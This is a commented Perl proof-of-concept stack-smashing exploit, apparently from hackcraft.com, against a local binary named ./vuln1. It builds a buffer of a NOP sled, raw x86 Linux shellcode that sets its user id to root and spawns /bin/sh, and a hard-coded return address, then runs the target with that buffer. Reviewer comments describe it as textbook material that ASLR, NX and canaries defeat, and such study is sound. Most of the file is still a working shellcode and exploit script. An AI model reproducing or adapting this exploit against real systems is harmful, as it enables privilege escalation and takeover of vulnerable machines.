BOF ~~~~~~~ #!/usr/bin/perl
# Classic stack-smashing proof of concept against a local binary ./vuln1.
# It builds one buffer in the textbook layout
#     [ NOP sled ][ shellcode ][ repeated return address ]
# of exactly $len bytes, then hands it to the target both as argv[1] and in
# the environment variable KIDVULN, and lets the target's own saved return
# address be replaced by $ret + $offset.
#
# Reviewer notes (defensive context):
#   * No `use strict; use warnings;` -- every variable below is a package
#     global, and $buffer is never initialised before the first `.=`.
#   * $ret is a hard-coded absolute stack address read off the author's
#     debugger session.  It is only meaningful on that machine and that
#     kernel; stack address randomisation (ASLR) and non-executable stacks
#     (NX) are precisely the mitigations that make this layout fail, and
#     stack canaries detect the overwrite before the return.
#   * The technique is the one described in the old "smashing the stack"
#     literature; nothing here is specific to any current software.

$shellcode = # HACKCRAFT shellcode
# NOTE(review): raw x86 machine code, kept as a byte string.  The embedded
# ASCII fragments ("HACK", "CRAF", "T  \n", "//bi", "n/sh") and the repeated
# `int 0x80` (\xcd\x80) sequences point to a Linux/x86 payload that prints a
# banner and then spawns a shell -- confirm by disassembly rather than
# trusting this comment.  Length is 6*12 + 9 = 81 bytes.
"\x31\xc0\x31\xdb\x31\xd2\x53\x68\x54\x20\x20\x0a".
"\x68\x43\x52\x41\x46\x68\x48\x41\x43\x4b\x89\xe1".
"\xb2\x0f\xb0\x04\xcd\x80\x31\xc0\x31\xc0\x31\xdb".
"\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e\x2f".
"\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24".
"\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0".
"\xb0\x01\xcd\x80\x5d\xc3\x8d\x76\x00";

# $len = 1024 + 8;
# The length needed to overwrite EIP.
# (Total size of the crafted buffer; the "+ 8" presumably covers the saved
# frame pointer and the saved return address above a 520-byte local buffer
# in the target -- the target itself is not visible here.)
$len = 520 + 8;

# $ret = 0xbffffc03;
# My stack pointer after the SEGMENTATION FAULT (info reg ESP)
$ret = 0xbffffccf;
# This is EXACTLY where the NOPs start
# (i.e. the address the author observed; any value inside the NOP sled
# would do, which is the whole point of the sled.)

$nop = "\x90"; # x86 NOP
$offset = 0; # Default offset to try.

print("=================================================================\n");
print(" Stack Overflow Exploit \n\n");
print(" by Hugo Mart?n [ www.hackcraft.com ] \n");
print("=================================================================\n");

# Optional single argument: a numeric offset added to $ret.  It is used
# unvalidated in arithmetic below, so a non-numeric argument silently
# becomes 0.
if (@ARGV == 1) { $offset = $ARGV[0]; }
print("Usando el offset : $offset \n");

# Stage 1: the NOP sled.  $c only counts the NOPs for the report below.
# With $len = 528 and an 81-byte shellcode this is 528 - 81 - 100 = 347
# bytes; the reserved 100 bytes are exactly the 25 copies of the 4-byte
# return address appended in stage 3, so the finished buffer is $len bytes.
$c=0;
for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) { $buffer .= $nop; $c++; }
# [ Buffer: NNNNNNNNNNNNNN ]

# Stage 2: the payload itself.
$buffer .= $shellcode;
# [ Buffer: NNNNNNNNNNNNNNSSSSS ]

print("Address: 0x", sprintf('%lx',($ret + $offset)),"\n");
# 'l' packs a native-endian signed 32-bit long, so on the intended 32-bit
# x86 host this is the 4-byte little-endian encoding of the address.
$new_ret = pack('l', ($ret + $offset));

# Stage 3: pad to $len with the return address.  $i continues from where
# stage 1 stopped, skipping over the shellcode bytes, and advances 4 per
# copy so the total length lands on exactly $len.
for ($i += length($shellcode); $i < $len; $i += 4) { $buffer .= $new_ret; }
# [ Buffer: NNNNNNNNNNNNNNNNSSSSSRRRRRR ]

$lshellcode=length($shellcode);
print("\n\nDATA:\n");
print("Longitud del shellcode: $lshellcode \n");
# Prints the raw buffer (including non-printable bytes) to the terminal.
print("buffer specially crafted : $buffer \n");
print("cantidad de NOPs: $c \n\n\n");

# `local` on a %ENV element at file scope: the value is exported to the
# child process started by exec below.
local($ENV{'KIDVULN'}) = $buffer;
# Single-string exec is handed to /bin/sh, so the raw payload bytes
# (including the 0x0a newline inside the shellcode and the surrounding
# single quotes) are subject to shell parsing before ./vuln1 sees them.
exec("./vuln1 '$buffer'");
# Copies the shellcode into the KIDVULN variable to increase the chances of
# finding the offset (RET), and runs vuln.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ www.hackcraft.com